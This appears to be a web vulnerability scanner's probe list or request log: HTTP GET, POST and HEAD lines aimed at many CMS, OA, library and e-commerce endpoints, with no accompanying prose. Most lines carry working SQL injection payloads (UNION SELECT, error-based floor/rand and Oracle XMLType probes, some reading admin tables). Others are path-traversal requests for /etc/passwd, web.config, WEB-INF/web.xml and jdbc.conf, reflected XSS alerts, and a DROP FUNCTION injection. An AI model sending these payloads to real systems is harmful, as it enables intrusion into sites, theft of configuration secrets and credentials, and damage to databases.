GET /bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/nowwebissue.asp
GET /bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
POST /bit-xxzs/xmlpzs/prewebissue.asp
POST /epstar/servlet/RaqFileServer?action=save&fileName=test.txt
GET /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
GET /www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
HEAD /body/Function/download.asp?filepath=../download.asp&filename=download
GET /news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
GET /install/step4.aspx
GET /admin/Role/Role_List.aspx
GET /sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
POST /admin/operupload.asp
POST /member/findAddressById.json
POST /member/zoneNm.json
GET /main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
HEAD /i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
GET /api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
POST /search.php
GET /opac/index.jsp?page=../web-inf/web.xml
HEAD /datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
GET /datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
GET /account.t?op=showAccountList
GET /oa_server/App_Pages/App_page/News_add.aspx
POST /truexxgk/app/YsqgkController/smallQuery?type=1
POST /truexxgk/app/YsqgkController/smallQuery?type=1
GET /store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /detail.asp?id=-306/**/And/**/1=char(106)--&&t=
GET /content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /UploadHandler.ashx
GET /index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
GET /class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
POST /admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
POST /post.php?act=phpok&id=12
POST /weixin/index.php?m=index&c=index
POST /work_flow/formOptJSPUpload.jsp?flag=1
POST /work_flow/formStartJSPUpload.jsp?flag=1
POST /admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
POST /public/editor/tpsc1.jsp?flag=sc
GET /outImg?imgPath=c:/boot.ini
GET /outImg?imgPath=/etc/passwd
POST /gsgl.asp?stype=
GET /common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
GET /piw/Member/UploadMemberAttach.jsp
GET /piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
GET /piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
GET /piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
HEAD /cardload.jsp?filename=../etc/passwd&maininfo_id=-12
GET /systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
GET /show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
GET /FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
GET /Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
GET /news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
GET /OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
GET /Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
GET /wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
GET /answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
POST /member.php?act=updateinfo
POST /site56/LmsOrder/trackOrder.jspx
GET /house/ProcManage/WebHouse/HousePic.aspx
GET /CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
GET /CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
HEAD /_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
GET /FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
POST /loginverify.asp
POST /newssearch.cfm
GET /mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
GET /news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
HEAD /down.aspx?Url=../web.config
HEAD /showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
GET /sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
GET /opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
GET /journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
GET /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
GET /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
GET /MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
GET /install/install.php.lock?step=2
GET /cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
GET /getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
HEAD /web.config.file.aspx
GET /wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
POST /information/changeState.asp
POST /MessageList.asp?action=search
POST /bangong/GroupInforDo.asp
POST /bangong/ShortCutInforDo.asp
HEAD /jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
GET /shownews.aspx?newsno=-1'%20and%201=char(106)%20--
GET /nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
POST /ratercp.php?action=savepassword
GET /admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
POST /admincp.php?action=constructionresults&todo=del
POST /admincp.php?action=declarepublish&todo=del
GET /plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
GET /index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
GET /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
POST /index.php?action=search&todo=site
GET /index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
POST /include/upload.inc.php
POST /admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
POST /admincp.php?action=vote&todo=savevote
GET /admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
POST /admincp.php?action=/../teach/sitebook&id=1
GET /seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
GET /complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
GET /list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
POST /index_communicate.php
GET /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
GET /pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
GET /pub/search/default.asp?id=-1/**/and/**/1=char(106)--
GET /pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
GET /index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
HEAD /DownLoad.aspx?mu=../&fn=web.config&newname=web.config
GET /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
GET /NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
GET /WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
POST /pt/edu/stuTransfer.aspx
GET /NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
GET /news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
GET /news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
GET /allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
HEAD /download2.aspx?fn=../web.config
HEAD /DownLoad.aspx?Accessory=../index.aspx
POST /mod/news/qianshoucount.php
POST /mod/card/quest.php?op=get_m
POST /mod/home/quest.php?op=get_group_list
GET /NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
GET /NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
GET /js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
HEAD /ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
GET /news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
GET /ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
GET /jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
POST /scrp/book.cfm?sKeyword=1&sFieldName=bname
GET /main/
GET /asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
GET /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
GET /install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
GET /module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
GET /myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
POST /Logon?action=logon
GET /UserSecurityController.do?method=getPassword&step=2&userName=admin
GET /webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
HEAD /common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
GET /OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
GET /showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
POST /general/crm/apps/crm/include/import/export.php
GET /Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
GET /Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
HEAD /admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
GET /cms/conf/system.xml
POST /erp/reportmanage/taskreport/lljinduadd.aspx
POST /oa/erp/SalePlan/YearPlanAdd.aspx
GET /oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
GET /oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
GET /oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
HEAD /downTemp.aspx?type=downDb&fileName=../web.config
GET /showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
GET /showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
GET /cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
GET /datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
GET /user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
GET /admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
GET /admin/manage.jsp
GET /shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
GET /content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
POST /mod/shop/quest/ajax.php?op=auction_buy
GET /wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
GET /news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
POST /mod/payment/quest.php?op=check&page=b2b
POST /mod/ntga/jwsview.php
POST /uploadd.php
GET /jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
GET /admin/backup.aspx
POST /mod/mad/video_upload.php
GET /business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
GET /SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
GET /Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
POST /frontProduct/search.ac
